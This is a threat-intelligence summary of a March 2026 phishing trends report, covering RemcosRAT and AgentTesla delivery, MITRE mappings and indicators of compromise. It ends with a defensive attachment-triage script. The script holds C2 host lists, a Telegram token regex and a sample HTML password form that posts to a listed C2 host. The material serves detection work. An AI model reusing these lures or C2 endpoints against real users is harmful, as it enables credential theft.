March 2026 Phishing Email Trends Report

Trojans made up the largest category of attachment-based threats in March 2026 at 21%, while phishing (FakePage) fell to 15% despite only a slight decrease in volume. The report highlights HTML-based phishing and PDF hyperlink abuse, execution triggered by opening documents or decompressing archives, and remote-control malware using C2 channels such as Telegram API tokens and controller.airdns.org:45177. #RemcosRAT #AgentTesla

Keypoints

  • Trojans comprised the largest share of attachment-based threats in March 2026 (21%), followed by phishing (15%), downloaders (9%), and droppers (7%).
  • Phishing activity shifted toward HTML-based pages and PDF hyperlinks used to harvest credentials and redirect victims to fake sites.
  • Script-based threats are dominated by HTML (14%) and JavaScript (11%), and script-type distribution increased month-over-month.
  • Compressed (ZIP 14%, RAR 8%, 7Z 5%) and document (PDF 13%, XLS 5%, DOCX 2%) delivery remain common vectors for RemcosRAT and AgentTesla distribution via decompression or document execution.
  • Adversaries use social engineering tactics such as double extensions and legitimate file names, and impersonate courier/financial organizations like FedEx, DHL, Hana Bank, and Woori Bank.
  • Command-and-control channels observed include Telegram API tokens, controller.airdns.org:45177, and ccp11nl.hyperhost.ua:587, with external mail servers also used as C2.
  • The report includes a top-30 MD5 list of collected malware samples to support detection and response efforts.

MITRE Techniques

  • [T1566] Phishing – Use of HTML pages and PDF links to harvest credentials or redirect victims to fake sites (‘phishing uses HTML scripts and PDF hyperlinks to steal login credentials or lead to fake sites.’)
  • [T1566.001] Spearphishing Attachment – Attachments delivering trojans, downloaders, and droppers accounted for a large portion of attachment-based threats (‘trojans accounted for the largest share of attachment-based threats in March 2026 at 21%.’)
  • [T1566.002] Spearphishing Link – Phishing via embedded links in HTML/PDF to lead victims to fake pages for credential capture (‘phishing uses HTML scripts and PDF hyperlinks to steal login credentials or lead to fake sites.’)
  • [T1204] User Execution – Social engineering techniques (double extensions, legitimate file names) used to entice users to open and execute malicious files (‘trojans continue to circulate variants with double extensions and legitimate file names to entice execution.’)
  • [T1105] Ingress Tool Transfer – Malware delivered through decompression and execution from archives or documents (e.g., AgentTesla from a compressed archive, RemcosRAT from a PDF) (‘AgentTesla was distributed by decompressing and executing a textile exporter.’)
  • [T1071] Application Layer Protocol – Use of application-layer channels for C2, including Telegram API tokens and external mail servers (‘a Telegram API call token was used as C2.’)
  • [T1036] Masquerading – Use of deceptive file names and double extensions to appear legitimate and bypass user suspicion (‘trojans continue to circulate variants with double extensions and legitimate file names to entice execution.’)

Indicators of Compromise

  • [MD5] malware file hashes – 06dc18771404694814d6a430bb65d1a3, 0a15c9a545fbf78d77f8c130a3b0f840, and 28 more hashes listed in the report
  • [Domain] C2 domains and ports – controller.airdns.org:45177, ccp11nl.hyperhost.ua:587
  • [Token] Telegram API token – used as a C2 channel in script-based phishing cases (‘Telegram API call token’ referenced as C2)
  • [File type/name] malicious lure files and archives – PDF disguised as an industrial equipment supplier, compressed textile exporter archive (ZIP/RAR) used to deliver AgentTesla
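The following attachment triage script is an added example for the Masquerading/User Execution tactics and the IoC list above; it is not code from AhnLab or from the report. It flags double-extension names (including the spacing trick of padding before the real extension), executables nested inside ZIP archives, HTML attachments that carry a password form, and attachments whose content or MD5 matches the two hashes and two C2 host:port pairs quoted above. The extension lists, the Telegram token regex, and the sample attachments are constructed assumptions for the demonstration, not indicators from the report.

```python
import hashlib
import io
import re
import zipfile

# Indicators copied from the report summary above.
KNOWN_MD5 = {
    "06dc18771404694814d6a430bb65d1a3",
    "0a15c9a545fbf78d77f8c130a3b0f840",
}
KNOWN_C2 = {"controller.airdns.org:45177", "ccp11nl.hyperhost.ua:587"}

# Extension classes (assumed lists for this example, not taken from the report).
EXEC_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "hta"}
LURE_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}

# Telegram bot tokens have the shape "<bot id>:<secret>"; this regex is an
# assumption based on the public Bot API URL format, not a report pattern.
TELEGRAM_TOKEN_RE = re.compile(rb"api\.telegram\.org/bot\d{8,10}:[A-Za-z0-9_-]{30,40}")
PASSWORD_FIELD_RE = re.compile(rb"<input[^>]+type\s*=\s*['\"]?password", re.I)


def extension_parts(name: str) -> list[str]:
    """Lower-cased extension chain of a file name, with whitespace padding removed."""
    compact = re.sub(r"\s+", "", name.lower())
    return compact.split(".")[1:]


def is_double_extension(name: str) -> bool:
    """True for lures such as 'Invoice.pdf.exe' (document-looking name, executable tail)."""
    parts = extension_parts(name)
    return len(parts) >= 2 and parts[-2] in LURE_EXT and parts[-1] in EXEC_EXT


def is_executable(name: str) -> bool:
    parts = extension_parts(name)
    return bool(parts) and parts[-1] in EXEC_EXT


def inspect_zip(data: bytes) -> list[str]:
    """Look inside a ZIP for members that would execute when the user opens them."""
    reasons = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if is_double_extension(info.filename):
                    reasons.append(f"archive member {info.filename} uses a double extension")
                elif is_executable(info.filename):
                    reasons.append(f"archive member {info.filename} is executable")
    except zipfile.BadZipFile:
        reasons.append("ZIP signature but archive fails to parse")
    return reasons


def assess_attachment(name: str, data: bytes) -> list[str]:
    """Return the reasons (possibly none) an attachment deserves analyst attention."""
    reasons = []
    digest = hashlib.md5(data).hexdigest()
    if digest in KNOWN_MD5:
        reasons.append(f"md5 {digest} matches report IoC")
    if is_double_extension(name):
        reasons.append("double extension on attachment name")
    elif is_executable(name):
        reasons.append("directly attached executable")
    for c2 in sorted(KNOWN_C2):
        if c2.encode() in data:
            reasons.append(f"references C2 {c2}")
    if TELEGRAM_TOKEN_RE.search(data):
        reasons.append("embedded Telegram bot API token")
    parts = extension_parts(name)
    if parts and parts[-1] in {"html", "htm"} and PASSWORD_FIELD_RE.search(data):
        reasons.append("HTML attachment contains a password form")
    if data.startswith(b"PK\x03\x04"):
        reasons.extend(inspect_zip(data))
    return reasons


def build_samples() -> dict[str, bytes]:
    """Constructed sample attachments (harmless placeholder bytes) for a local run."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Textile_Export_Order.pdf.exe", b"MZ placeholder, not a real binary")
    html = (b"<html><form action='http://controller.airdns.org:45177/login'>"
            b"<input type=password name=pw></form></html>")
    return {
        "Textile_Export_Order.zip": buf.getvalue(),
        "DHL_Shipment_Notice.html": html,
        "Hana_Bank_Statement.pdf": b"%PDF-1.4 benign placeholder text",
    }


def scan(attachments: dict[str, bytes]) -> dict[str, list[str]]:
    return {name: assess_attachment(name, data) for name, data in attachments.items()}


if __name__ == "__main__":
    for name, reasons in scan(build_samples()).items():
        print(name, "->", reasons or ["no findings"])
```

The checks are deliberately independent so a single attachment can accumulate several reasons; in a mail gateway the hash and C2 sets would be loaded from the full 30-entry list and the report's other indicators rather than the two of each quoted here.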


Read more: https://asec.ahnlab.com/en/93465/